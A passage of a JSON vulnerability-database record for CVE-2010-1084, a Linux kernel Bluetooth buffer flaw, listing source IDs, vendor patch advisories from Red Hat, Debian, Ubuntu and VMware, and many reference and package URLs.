        "id": "JVNDB-2010-001934"
      },
      {
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "db": "PACKETSTORM",
        "id": "90264"
      },
      {
        "db": "PACKETSTORM",
        "id": "98412"
      },
      {
        "db": "PACKETSTORM",
        "id": "89938"
      },
      {
        "db": "PACKETSTORM",
        "id": "90307"
      },
      {
        "db": "PACKETSTORM",
        "id": "89939"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-1084"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-087"
      }
    ]
  },
  "id": "VAR-201003-1068",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.33838382
  },
  "last_update_date": "2023-12-18T11:32:17.749000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel-2.6.18-194.6.AXS3",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=1264"
      },
      {
        "title": "ChangeLog-2.6.34",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.34"
      },
      {
        "title": "RHSA-2010:0610",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0610.html"
      },
      {
        "title": "VMSA-2011-0003",
        "trust": 0.8,
        "url": "http://www.vmware.com/security/advisories/vmsa-2011-0003.html"
      },
      {
        "title": "netbluetoothsco",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=4483"
      },
      {
        "title": "netbluetoothrfcommsock",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=4482"
      },
      {
        "title": "netbluetoothrfcommcore",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=4481"
      },
      {
        "title": "netbluetoothl2cap",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=4480"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100610 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100631 - security advisory"
      },
      {
        "title": "Debian Security Advisories: DSA-2053-1 linux-2.6 -- privilege escalation/denial of service/information leak",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=9640efc147e03b7d885b85adb8146ce6"
      },
      {
        "title": "Ubuntu Security Notice: linux regression",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-947-2"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-source-2.6.15 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-947-1"
      },
      {
        "title": "VMware Security Advisories: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=ea953b0a91a1816979ec1d304d5e3d93"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2010-1084"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001934"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-087"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001934"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-1084"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=576018"
      },
      {
        "trust": 1.9,
        "url": "http://www.securityfocus.com/bid/38898"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2010/03/23/1"
      },
      {
        "trust": 1.7,
        "url": "http://security-tracker.debian.org/tracker/cve-2010-1084"
      },
      {
        "trust": 1.2,
        "url": "http://www.vmware.com/security/advisories/vmsa-2011-0003.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.debian.org/security/2010/dsa-2053"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/39830"
      },
      {
        "trust": 1.1,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0610.html"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/43315"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/archive/1/516397/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=101545f6fef4a0a3ea8daf0b5b880df2c6a92a69"
      },
      {
        "trust": 1.0,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commitdiff%3bh=101545f6fef4a0a3ea8daf0b5b880df2c6a92a69"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1084"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-1084"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.34-rc2-git1.log"
      },
      {
        "trust": 0.3,
        "url": "http://support.avaya.com/css/p8/documents/100123965"
      },
      {
        "trust": 0.3,
        "url": "http://support.avaya.com/css/p8/documents/100114249"
      },
      {
        "trust": 0.3,
        "url": "http://support.avaya.com/css/p8/documents/100141285"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0008"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1088"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4537"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1087"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1162"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0727"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1083"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1084"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1086"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0437"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32.orig.tar.gz"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0741"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0298"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0419"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1085"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4271"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0306"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1148"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1146"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/products/corporate/evm/"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/vulnerability_scanning/personal/"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/119.html"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=21140"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/947-2/"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3556"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0086"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0085"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1086"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0730"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1088"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027919"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2939"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1055"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/support/vsphere4/doc/vsp_esxi41_u1_rel_notes.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3571"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0095"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0307"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0092"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0093"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3555"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3548"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1031330"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3554"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3562"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0088"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0084"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0091"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0089"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3557"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3550"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0085"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1384"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3567"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0838"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0086"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0003"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0837"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3553"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0106"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos_vi.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2227"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0107"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2902"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2901"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/support/vsphere4/doc/vsp_esx41_u1_rel_notes.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1085"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0091"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0841"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0840"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0291"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2248"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0415"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3561"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3541"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3559"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3565"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027904"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0107"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0093"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0433"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0842"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0082"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3574"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0886"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0734"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1157"
      },
      {
        "trust": 0.1,
        "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0094"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0007"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0850"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2524"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0839"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1087"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0622"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0090"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-3825"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3573"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-5416"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security/advisories"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1384"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0088"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0849"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2070"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4308"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3549"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3548"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2693"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4308"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0007"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3568"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/security_response.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0084"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5416"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3864"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3825"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0410"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1321"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3572"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0092"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1437"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0003"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0094"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3566"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0847"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0740"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0082"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0437"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0844"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/support/pubs/vs_pages/vsp_pubs_esx41_vc41.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3548"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2066"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0089"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2902"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0087"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0087"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1436"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2693"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1029353"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0085"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0846"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2226"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1173"
      },
      {
        "trust": 0.1,
        "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0008"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1641"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2928"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0106"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0845"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0848"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0095"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1187"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2521"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3569"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0085"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0090"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2901"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3081"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3551"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0843"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.84_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
